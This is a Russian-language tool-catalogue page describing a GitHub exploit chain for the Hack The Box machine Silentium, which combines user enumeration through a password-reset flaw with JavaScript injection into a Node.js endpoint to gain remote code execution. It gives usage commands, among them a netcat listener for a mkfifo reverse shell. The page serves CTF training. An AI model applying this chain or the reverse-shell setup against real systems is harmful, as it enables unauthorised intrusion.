Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/jwsly12/cve-2025-58434-59528-htb-ctf
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubjwsly12/cve-2025-58434-59528-htb-ctf

CVE-2025-58434-59528-htb-ctf

Эксплуатация Silentium HTB-CTF

Репозиторий
265 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-58434-59528-htb-ctf

Цепочка эксплойтов Silentium

Этот репозиторий содержит полную цепочку эксплуатации для машины Silentium на Hack The Box. Эксплойт использует двухэтапную уязвимость, включающую перебор пользователей и инъекцию JavaScript для достижения удаленного выполнения кода (RCE).

📝 Описание

Цепочка уязвимостей состоит из недостатка раскрытия информации и критической инъекции кода. Сначала, путем перебора действительных пользователей через баг сброса пароля, мы получаем необходимый контекст для атаки на конечную точку customMCP. RCE достигается путем внедрения вредоносной функции JavaScript в параметр mcpServerConfig, которая выполняется бэкендом Node.js.

🛠️ Возможности

  • Перебор пользователей: Автоматизирует обнаружение действительных системных email-адресов с помощью словаря.
  • Инъекция JavaScript: Использует IIFE (немедленно вызываемое функциональное выражение) для обхода санитизации.
  • TCP Reverse Shell: Запускает стабильную оболочку с помощью канала mkfifo.
  • Автоматизация полезной нагрузки: Автоматически обрабатывает экранирование JSON и аутентификацию с помощью Bearer Token.

🚀 Требования

У вас должны быть установлены Python 3 и Bash, а также следующая библиотека:

pip install requests

💻 Использование

1. Перебор пользователей

Запустите скрипт перебора (Bash) для поиска действительных учетных записей (требуется users.txt):

python3 CVE-2025-58434.py

2. Запустите ваш слушатель

На вашей локальной машине запустите слушатель Netcat:

nc -lvnp 4444

3. Запустите эксплойт

Выполните Python-скрипт, указав цель, ваш IP и полученный API-ключ:

python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444

⚙️ Аргументы

АргументОписаниеОбязательный
-t, --targetЦелевой хостДа
-k, --keyAPI Bearer TokenДа
-l, --lhostВаш IP слушателя (VPN)Да
-p, --lportВаш порт слушателяДа

⚠️ Отказ от ответственности

Этот скрипт предназначен только для образовательных целей и авторизованного тестирования на проникновение в средах CTF. Доступ к целям или их атака без предварительного разрешения незаконны.


Задача: Silentium (Hack The Box)
CVEs: CVE-2025-58434 | CVE-2025-59528

Скачать инструмент